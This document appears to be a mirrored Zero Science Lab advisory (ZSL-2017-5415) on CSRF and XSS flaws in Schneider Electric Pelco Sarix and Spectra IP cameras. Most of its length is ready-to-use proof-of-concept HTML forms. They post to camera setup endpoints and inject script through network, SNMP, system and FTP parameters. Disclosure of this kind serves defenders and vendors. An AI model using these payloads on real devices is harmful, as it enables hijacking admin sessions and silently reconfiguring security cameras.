扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 |
Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. Sarix™ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVision™ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need. Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php 07.04.2017 -- CSRF/XSS on username parameter: ------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/dot1x/update" method="POST"> <input type="hidden" name="dot1x" value="on" /> <input type="hidden" name="protocol" value="EAP-TLS" /> <input type="hidden" name="inner_auth" value="CHAP" /> <input type="hidden" name="username" value='"><script>alert(1)</script>' /> <input type="hidden" name="password" value="blah" /> <input type="hidden" name="anonymous_id" value=" " /> <input type="hidden" name="ca_certificate" value="test" /> <input type="hidden" name="client_certificate" value="test" /> <input type="hidden" name="private_key" value="test" /> <input type="hidden" name="private_key_password" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: ------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/general/update" method="POST"> <input type="hidden" name="hostname" value='"><script>alert(2)</script>' /> <input type="hidden" name="http_port" value='"><script>alert(3)</script>' /> <input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' /> <input type="hidden" name="dhcp" value="off" /> <input type="hidden" name="ip_address" value='"><script>alert(5)</script>' /> <input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' /> <input type="hidden" name="gateway" value='"><script>alert(7)</script>' /> <input type="hidden" name="nameservers" value='"><script>alert(8)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on version parameter: ------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/snmp/update" method="POST"> <input type="hidden" name="version" value='";alert(9)//' /> <input type="hidden" name="v2_community_string" value="public" /> <input type="hidden" name="v2_receiver_address" value="" /> <input type="hidden" name="v2_trap_community_string" value="trapbratce" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: ---------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/system/general/update" method="POST"> <input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' /> <input type="hidden" name="enable_leds" value="on" /> <input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' /> <input type="hidden" name="ntp_server_from_dhcp" value="false" /> <input type="hidden" name="ntp_server" value="';alert(12)//'" /> <input type="hidden" name="region" value="Macedonia';alert(13)//" /> <input type="hidden" name="zone" value="Kumanovo';alert(14)//" /> <input type="hidden" name="enable_time_overlay" value="on" /> <input type="hidden" name="enable_name_overlay" value="off" /> <input type="hidden" name="position" value="topright" /> <input type="hidden" name="date_format" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: -------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/events/handlers/update" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="relay_sentinel" value="relay_sentinel" /> <input type="hidden" name="name" value='"><script>alert(15)</script>' /> <input type="hidden" name="type" value="Ftp" /> <input type="hidden" name="email_to" value="" /> <input type="hidden" name="email_from" value="" /> <input type="hidden" name="email_subject" value="" /> <input type="hidden" name="email_message" value="" /> <input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="limit_size" value="" /> <input type="hidden" name="limit_size_scale" value="K" /> <input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' /> <input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' /> <input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' /> <input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' /> <input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="relay_bankName" value="GPIO" /> <input type="hidden" name="relay_index" value="0" /> <input type="hidden" name="relay_on_time" value="0.1" /> <input type="hidden" name="relay_off_time" value="0.1" /> <input type="hidden" name="relay_pulse_count" value="" /> <input type="hidden" name="filter_start0" value="" /> <input type="hidden" name="filter_stop0" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> |
体验盒子
